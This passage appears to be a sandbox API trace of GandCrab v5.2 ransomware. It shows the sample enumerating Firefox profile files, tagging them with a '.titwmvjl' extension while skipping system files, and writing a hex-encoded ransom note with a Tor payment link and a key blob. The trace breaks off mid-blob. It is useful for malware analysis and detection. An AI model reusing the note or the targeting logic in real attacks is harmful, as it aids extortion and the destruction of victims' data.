returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock" [0082.306] lstrlenW (lpString=".titwmvjl") returned 9 [0082.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock") returned 120 [0082.306] VirtualAlloc (lpAddress=0x0, dwSize=0x130, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.306] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 129 [0082.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock") returned 120 [0082.306] lstrlenW (lpString=".lock") returned 5 [0082.307] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.307] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0082.307] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.307] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.307] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.307] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.307] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.307] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt" [0082.307] lstrlenW (lpString=".titwmvjl") returned 9 [0082.307] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt") returned 116 [0082.307] VirtualAlloc (lpAddress=0x0, dwSize=0x128, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.308] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 125 [0082.308] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt") returned 116 [0082.308] lstrlenW (lpString=".txt") returned 4 [0082.308] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.308] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.308] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.308] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.308] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt") returned 116 [0082.308] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\TITWMVJL-DECRYPT.txt") returned 116 [0082.308] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.308] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.308] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.308] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.309] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.309] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.309] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.309] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.309] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.309] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0082.309] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0082.310] CloseHandle (hObject=0x2d4) returned 1 [0082.311] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.311] lstrcmpW (lpString1="gmp-widevinecdm", lpString2=".") returned 1 [0082.311] lstrcmpW (lpString1="gmp-widevinecdm", lpString2="..") returned 1 [0082.311] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="gmp-widevinecdm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm" [0082.311] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\" [0082.311] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.311] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.311] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.312] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.312] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.312] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.312] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.312] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\\\TITWMVJL-DECRYPT.txt") returned 117 [0082.312] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0082.314] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b